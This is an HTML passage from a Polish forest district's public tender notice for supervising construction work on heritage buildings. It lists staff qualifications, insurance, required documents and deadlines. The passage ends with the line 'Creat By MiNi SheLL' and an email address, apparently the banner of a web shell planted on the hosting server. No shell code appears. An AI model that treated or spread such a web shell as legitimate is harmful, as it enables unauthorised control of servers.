</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować:
Inspektorem nadzoru robót konstrukcyjno - budowlanych 
Wymagane doświadczenie zawodowe: co najmniej 5 letnie doświadczenie jako kierownik budowy, kierownik robót lub inspektor nadzoru budowlanego posiadający uprawnienia budowlane bez ograniczeń (w zakresie pełnym) do sprawowania samodzielnych funkcji technicznych w budownictwie obejmujących zakres specjalności konstrukcyjno - budowlanej, w tym przy realizacji co najmniej 
1 inwestycji kubaturowej, dla której wartość robót wyniosła co najmniej 5.000.000 zł brutto oraz była wykonywana na obiektach wpisanych do rejestru zabytków. 
Inspektor nadzoru robót konserwatorskich
Wymagane doświadczenie zawodowe: co najmniej 2 letnie doświadczenie 
w zakresie kierowania lub nadzorowania robotami budowlanymi przy zabytkach nieruchomych, zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. (Dz. U. z 2011 r., nr 165, poz. 987) w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych - posiadający uprawnienia budowlane bez ograniczeń (w zakresie pełnym) do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno - budowlanej.
Inspektor nadzoru robót sanitarnych
Wymagane doświadczenie zawodowe: co najmniej 5 letnie doświadczenie zawodowe jako kierownik robót, kierownik budowy lub inspektor nadzoru robót - posiadający uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń (w zakresie pełnym) w zakresie sieci instalacji 
i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. 
Inspektor nadzoru robót elektrycznych
Wymagane doświadczenie zawodowe: co najmniej 5 letnie doświadczenie zawodowe jako kierownik robót, kierownik budowy lub inspektor nadzoru robót - posiadający uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń (w zakresie pełnym) w zakresie sieci instalacji i urządzeń elektrycznych oraz elektroenergetycznych, niskoprądowych, teletechnicznych. 

zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r.243, poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. (Dz. U. z 2006 r. nr 83, poz. 578 z późn. zm.) w sprawie samodzielnych funkcji technicznych w budownictwie. 

Zamawiający dopuszcza łączenie stanowisk przewidzianych w pkt. c tylko pod warunkiem spełniania łącznie ww. wymagań dotyczących doświadczenia dla danych stanowisk.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę dla każdej z części, na zasadzie SPEŁNIA NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 3.000.000 zł.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę dla każdej z części, na zasadzie SPEŁNIA NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta cenowa, Odpowiednie pełnomocnictwa, Dowód wniesienia wadium, dokumenty potwierdzające, że usługi zostały wykonane należycie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>9.	Zamawiający przewiduje zmiany w zawartej umowie w zakresie, gdy:
a.	planowany okres realizacji robót budowlanych ulegnie wydłużeniu, bez względu na okoliczności i przyczyny tego wydłużenia, 
b.	nastąpi zmiana powszechnie obowiązujących przepisów prawa, norm lub warunków technicznych, która to zmiana będzie miała wpływ na realizację zadania inwestycyjnego,
c.	wystąpi konieczność zmiany kadry przewidzianej do realizacji umowy, 
d.	ulegnie zmianie urzędowa stawka VAT na usługi objęte przedmiotem niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/nadl_podanin/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Podanin
Podanin 65
64-800 Chodzież.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 09:00, miejsce: Nadleśnictwo Podanin
Podanin 65
64-800 Chodzież
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com